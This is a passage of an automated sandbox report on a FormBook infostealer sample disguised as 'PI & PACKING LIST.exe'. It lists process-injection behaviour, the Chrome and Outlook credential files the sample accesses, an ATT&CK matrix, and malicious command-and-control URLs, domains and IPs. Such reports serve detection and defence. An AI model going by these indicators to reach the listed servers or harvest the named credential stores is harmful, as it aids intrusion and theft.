      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

      Stealing of Sensitive Information

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 00000003.00000000.345082941.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000002.512821683.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000000.326684434.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.353260864.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000002.512567942.0000000001330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000002.509273886.0000000000EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Tries to steal Mail credentials (via file / registry access)
      Source: C:\Windows\SysWOW64\control.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
      Tries to harvest and steal browser information (history, passwords, etc)
      Source: C:\Windows\SysWOW64\control.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
      Source: C:\Windows\SysWOW64\control.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
      Source: C:\Windows\SysWOW64\control.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
      Source: C:\Windows\SysWOW64\control.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
      Source: C:\Windows\SysWOW64\control.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
      Source: C:\Windows\SysWOW64\control.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

      Remote Access Functionality

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 00000003.00000000.345082941.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000002.512821683.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000000.326684434.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.353260864.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000002.512567942.0000000001330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000002.509273886.0000000000EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts1
      Shared Modules      		Path Interception612
      Process Injection      		1
      Masquerading      		1
      OS Credential Dumping      		121
      Security Software Discovery      		Remote Services1
      Email Collection      		Exfiltration Over Other Network Medium1
      Encrypted Channel      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
      Disable or Modify Tools      		LSASS Memory2
      Process Discovery      		Remote Desktop Protocol1
      Archive Collected Data      		Exfiltration Over Bluetooth3
      Ingress Tool Transfer      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)31
      Virtualization/Sandbox Evasion      		Security Account Manager31
      Virtualization/Sandbox Evasion      		SMB/Windows Admin Shares1
      Data from Local System      		Automated Exfiltration4
      Non-Application Layer Protocol      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)612
      Process Injection      		NTDS1
      Remote System Discovery      		Distributed Component Object ModelInput CaptureScheduled Transfer114
      Application Layer Protocol      		SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
      Deobfuscate/Decode Files or Information      		LSA Secrets13
      System Information Discovery      		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.common3
      Obfuscated Files or Information      		Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup Items12
      Software Packing      		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
      File Deletion      		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 signatures2 2 Behavior Graph ID: 756334 Sample: PI & PACKING LIST.exe Startdate: 30/11/2022 Architecture: WINDOWS Score: 100 32 Malicious sample detected (through community Yara rule) 2->32 34 Antivirus detection for URL or domain 2->34 36 Multi AV Scanner detection for submitted file 2->36 38 6 other signatures 2->38 8 PI & PACKING LIST.exe 3 2->8         started        process3 file4 24 C:\Users\user\...\PI & PACKING LIST.exe.log, ASCII 8->24 dropped 50 Injects a PE file into a foreign processes 8->50 12 PI & PACKING LIST.exe 8->12         started        15 PI & PACKING LIST.exe 8->15         started        signatures5 process6 signatures7 52 Modifies the context of a thread in another process (thread injection) 12->52 54 Maps a DLL or memory area into another process 12->54 56 Sample uses process hollowing technique 12->56 58 Queues an APC in another process (thread injection) 12->58 17 explorer.exe 12->17 injected process8 dnsIp9 26 www.cpitherapy.com 178.128.239.245, 49700, 49701, 49702 DIGITALOCEAN-ASNUS Netherlands 17->26 28 www.p-soils.com 162.43.120.154, 49703, 49704, 49705 CYBERTRAILSUS United States 17->28 30 5 other IPs or domains 17->30 40 System process connects to network (likely due to code injection or exploit) 17->40 21 control.exe 13 17->21         started        signatures10 process11 signatures12 42 Tries to steal Mail credentials (via file / registry access) 21->42 44 Tries to harvest and steal browser information (history, passwords, etc) 21->44 46 Deletes itself after installation 21->46 48 2 other signatures 21->48

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      PI & PACKING LIST.exe77%ReversingLabsByteCode-MSIL.Trojan.FormBook
      PI & PACKING LIST.exe57%VirustotalBrowse
      PI & PACKING LIST.exe100%Joe Sandbox ML

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      2.0.PI & PACKING LIST.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

      Domains

      SourceDetectionScannerLabelLink
      www.nu2uresale.store1%VirustotalBrowse
      www.p-soils.com3%VirustotalBrowse
      www.cpitherapy.com3%VirustotalBrowse

      URLs

      SourceDetectionScannerLabelLink
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      http://www.tiro.com0%URL Reputationsafe
      http://www.goodfont.co.kr0%URL Reputationsafe
      http://www.sajatypeworks.com0%URL Reputationsafe
      http://www.typography.netD0%URL Reputationsafe
      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
      http://fontfabrik.com0%URL Reputationsafe
      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
      http://www.sandoll.co.kr0%URL Reputationsafe
      http://www.urwpp.deDPlease0%URL Reputationsafe
      http://www.zhongyicts.com.cn0%URL Reputationsafe
      http://www.sakkal.com0%URL Reputationsafe
      http://www.carterandcone.coml0%URL Reputationsafe
      http://www.founder.com.cn/cn0%URL Reputationsafe
      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
      http://www.fontbureau.como0%URL Reputationsafe
      https://www.bengalindex.com/m5oe/?l48xI=yrQlZi/yeQekXtziTibn9LfL5FHN0Y47PbY0%Avira URL Cloudsafe
      http://www.cpitherapy.com/m5oe/?l48xI=Kdt0ttn6jBvm5dVCPGsq4sF6gZwVhJORDr+IW0q2lJvFs7kzNd/E4xjIZ8hkWN2nAiXaUCaRapMtLMo79OBUYLpofMwqWu/G3g==&y8dt=cR-TJP3pr48100%Avira URL Cloudmalware
      http://www.zkjk888.com/m5oe/?l48xI=lXL2hA4gPGXGkrsXCHLs63wEyc6+ZxTcosJkE7OIAbbgzBCGQ1RLZhLXXwLUr0PxIclnwkI7OF+QM6Klss4VWWvRg6rabD2uNg==&y8dt=cR-TJP3pr48100%Avira URL Cloudmalware
      http://www.bengalindex.com/m5oe/100%Avira URL Cloudmalware
      http://www.nu2uresale.store/m5oe/?l48xI=U9+cid+ik5YJF3jF27GFdJRqVXeG7FP+UvbSj6ZytGipCLvwOYSuUs/u1hqVfurTuH6/pVSyY1dCVh8DyPcg4wzd/AwTcksoYQ==&y8dt=cR-TJP3pr48100%Avira URL Cloudmalware
      http://www.nu2uresale.store/m5oe/100%Avira URL Cloudmalware
      http://www.p-soils.com/m5oe/?l48xI=OgbUJyD2Cs0iavfQBCvIOQvZdrfaRUMlkbnSDVoQDO79KZkwY+JyOZ2XW8xl2hee24/cs1yqqL6PnYlAwwwxD54r6/IzPRoMsg==&y8dt=cR-TJP3pr48100%Avira URL Cloudmalware
      http://www.bengalindex.com/m5oe/?l48xI=yrQlZi/yeQekXtziTibn9LfL5FHN0Y47PbY+gegrHfqcLEwJAZ2lhKdA1OTtZbcFcNKVJgIODn1wmw2XGX+PWpMZIoIdVyV5wA==&y8dt=cR-TJP3pr48100%Avira URL Cloudmalware
      http://www.p-soils.com/m5oe/100%Avira URL Cloudmalware
      http://35.78.89.1170%Avira URL Cloudsafe
      http://www.cpitherapy.com/m5oe/100%Avira URL Cloudmalware
      http://amh.sh/0%Avira URL Cloudsafe
      www.singglostudio.com/m5oe/0%Avira URL Cloudsafe
      http://amh.sh0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      www.nu2uresale.store
      		209.99.64.33
      		truetrueunknown
      www.p-soils.com
      		162.43.120.154
      		truetrueunknown
      www.zkjk888.com
      		35.78.89.117
      		truetrue
        		unknown
        www.cpitherapy.com
        		178.128.239.245
        		truetrueunknown
        ghs.googlehosted.com
        		142.250.203.115
        		truefalse
          		unknown
          www.bengalindex.com
          		unknown
          		unknowntrue
            		unknown
            www.gebouwpas.online
            		unknown
            		unknowntrue
              		unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://www.p-soils.com/m5oe/true
              • Avira URL Cloud: malware
              		unknown
              http://www.bengalindex.com/m5oe/false
              • Avira URL Cloud: malware
              		unknown
              http://www.cpitherapy.com/m5oe/?l48xI=Kdt0ttn6jBvm5dVCPGsq4sF6gZwVhJORDr+IW0q2lJvFs7kzNd/E4xjIZ8hkWN2nAiXaUCaRapMtLMo79OBUYLpofMwqWu/G3g==&y8dt=cR-TJP3pr48true
              • Avira URL Cloud: malware
              		unknown
              http://www.zkjk888.com/m5oe/?l48xI=lXL2hA4gPGXGkrsXCHLs63wEyc6+ZxTcosJkE7OIAbbgzBCGQ1RLZhLXXwLUr0PxIclnwkI7OF+QM6Klss4VWWvRg6rabD2uNg==&y8dt=cR-TJP3pr48true
              • Avira URL Cloud: malware
              		unknown
              www.singglostudio.com/m5oe/true
              • Avira URL Cloud: safe
              		low
              http://www.nu2uresale.store/m5oe/true
              • Avira URL Cloud: malware
              		unknown
              http://www.nu2uresale.store/m5oe/?l48xI=U9+cid+ik5YJF3jF27GFdJRqVXeG7FP+UvbSj6ZytGipCLvwOYSuUs/u1hqVfurTuH6/pVSyY1dCVh8DyPcg4wzd/AwTcksoYQ==&y8dt=cR-TJP3pr48true
              • Avira URL Cloud: malware
              		unknown
              http://www.cpitherapy.com/m5oe/true
              • Avira URL Cloud: malware
              		unknown
              http://www.p-soils.com/m5oe/?l48xI=OgbUJyD2Cs0iavfQBCvIOQvZdrfaRUMlkbnSDVoQDO79KZkwY+JyOZ2XW8xl2hee24/cs1yqqL6PnYlAwwwxD54r6/IzPRoMsg==&y8dt=cR-TJP3pr48true
              • Avira URL Cloud: malware
              		unknown
              http://www.bengalindex.com/m5oe/?l48xI=yrQlZi/yeQekXtziTibn9LfL5FHN0Y47PbY+gegrHfqcLEwJAZ2lhKdA1OTtZbcFcNKVJgIODn1wmw2XGX+PWpMZIoIdVyV5wA==&y8dt=cR-TJP3pr48false
              • Avira URL Cloud: malware
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://duckduckgo.com/chrome_newtabcontrol.exe, 0000000D.00000003.438741340.000000000118C000.00000004.00000020.00020000.00000000.sdmp, 71M40-2OQ.13.drfalse
                		high
                http://www.fontbureau.com/designersGPI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://duckduckgo.com/ac/?q=71M40-2OQ.13.drfalse
                    		high
                    http://www.fontbureau.com/designers/?PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://www.founder.com.cn/cn/bThePI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.fontbureau.com/designers?PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://search.yahoo.com?fr=crmas_sfpfcontrol.exe, 0000000D.00000003.438741340.000000000118C000.00000004.00000020.00020000.00000000.sdmp, 71M40-2OQ.13.drfalse
                          		high
                          http://www.tiro.comPI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.com/designersPI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://amh.shcontrol.exe, 0000000D.00000002.517236136.0000000005748000.00000004.10000000.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.goodfont.co.krPI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.sajatypeworks.comPI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.typography.netDPI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.founder.com.cn/cn/cThePI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.galapagosdesign.com/staff/dennis.htmPI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://fontfabrik.comPI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://www.bengalindex.com/m5oe/?l48xI=yrQlZi/yeQekXtziTibn9LfL5FHN0Y47PbYcontrol.exe, 0000000D.00000002.517422506.0000000005BFE000.00000004.10000000.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.galapagosdesign.com/DPleasePI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fonts.comPI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.sandoll.co.krPI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.urwpp.deDPleasePI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.zhongyicts.com.cnPI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.sakkal.comPI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000003.00000000.292294807.000000000F270000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.323770993.000000000F270000.00000004.00000001.00020000.00000000.sdmpfalse
                                		high
                                http://www.apache.org/licenses/LICENSE-2.0PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.fontbureau.comPI & PACKING LIST.exe, 00000000.00000002.261208049.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icocontrol.exe, 0000000D.00000003.438741340.000000000118C000.00000004.00000020.00020000.00000000.sdmp, 71M40-2OQ.13.drfalse
                                      		high
                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=71M40-2OQ.13.drfalse
                                        		high
                                        https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchcontrol.exe, 0000000D.00000003.438741340.000000000118C000.00000004.00000020.00020000.00000000.sdmp, 71M40-2OQ.13.drfalse
                                          		high
                                          https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=control.exe, 0000000D.00000003.438741340.000000000118C000.00000004.00000020.00020000.00000000.sdmp, 71M40-2OQ.13.drfalse
                                            		high
                                            http://www.carterandcone.comlPI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://ac.ecosia.org/autocomplete?q=71M40-2OQ.13.drfalse
                                              		high
                                              https://search.yahoo.com?fr=crmas_sfpcontrol.exe, 0000000D.00000003.438741340.000000000118C000.00000004.00000020.00020000.00000000.sdmp, 71M40-2OQ.13.drfalse
                                                		high
                                                http://www.fontbureau.com/designers/cabarga.htmlNPI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.founder.com.cn/cnPI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.fontbureau.com/designers/frere-jones.htmlPI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://amh.sh/control.exe, 0000000D.00000002.517236136.0000000005748000.00000004.10000000.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.jiyu-kobo.co.jp/PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.fontbureau.comoPI & PACKING LIST.exe, 00000000.00000002.261208049.0000000000B37000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.fontbureau.com/designers8PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=71M40-2OQ.13.drfalse
                                                        		high
                                                        http://35.78.89.117control.exe, 0000000D.00000002.517236136.0000000005748000.00000004.10000000.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown

                                                        World Map of Contacted IPs

                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs

                                                        Public IPs

                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        35.78.89.117
                                                        		www.zkjk888.comUnited States
                                                        		16509AMAZON-02UStrue
                                                        162.43.120.154
                                                        		www.p-soils.comUnited States
                                                        		11333CYBERTRAILSUStrue
                                                        142.250.203.115
                                                        		ghs.googlehosted.comUnited States
                                                        		15169GOOGLEUSfalse
                                                        178.128.239.245
                                                        		www.cpitherapy.comNetherlands
                                                        		14061DIGITALOCEAN-ASNUStrue
                                                        209.99.64.33
                                                        		www.nu2uresale.storeUnited States
                                                        		40034CONFLUENCE-NETWORK-INCVGtrue

                                                        General Information

                                                        Joe Sandbox Version:36.0.0 Rainbow Opal
                                                        Analysis ID:756334
                                                        Start date and time:2022-11-30 01:54:10 +01:00
                                                        Joe Sandbox Product:CloudBasic
                                                        Overall analysis duration:0h 8m 19s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:light
                                                        Sample file name:PI & PACKING LIST.exe
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                        Number of analysed new started processes analysed:15
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:1
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • HDC enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Detection:MAL
                                                        Classification:mal100.troj.spyw.evad.winEXE@6/2@6/5
                                                        EGA Information:
                                                        • Successful, ratio: 100%
                                                        HDC Information:
                                                        • Successful, ratio: 44.7% (good quality ratio 39.2%)
                                                        • Quality average: 72%
                                                        • Quality standard deviation: 33%
                                                        HCA Information:
                                                        • Successful, ratio: 98%
                                                        • Number of executed functions: 0
                                                        • Number of non-executed functions: 0
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .exe

                                                        Warnings

                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                        • TCP Packets have been reduced to 100
                                                        • Excluded IPs from analysis (whitelisted): 93.184.221.240, 93.184.220.29, 209.197.3.8
                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, cs9.wac.phicdn.net, ocsp.digicert.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, wu-bg-shim.trafficmanager.net, wu.azureedge.net
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.

                                                        Simulations

                                                        Behavior and APIs

                                                        TimeTypeDescription
                                                        01:55:06API Interceptor1x Sleep call for process: PI & PACKING LIST.exe modified

                                                        Joe Sandbox View / Context

                                                        IPs

                                                        No context

                                                        Domains

                                                        No context

                                                        ASNs

                                                        No context

                                                        JA3 Fingerprints

                                                        No context

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PI & PACKING LIST.exe.log

                                                        Download File
                                                        Process:C:\Users\user\Desktop\PI & PACKING LIST.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):1216
                                                        Entropy (8bit):5.355304211458859
                                                        Encrypted:false
                                                        SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                        MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                        SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                        SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                        SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                        Malicious:true
                                                        Reputation:high, very likely benign file
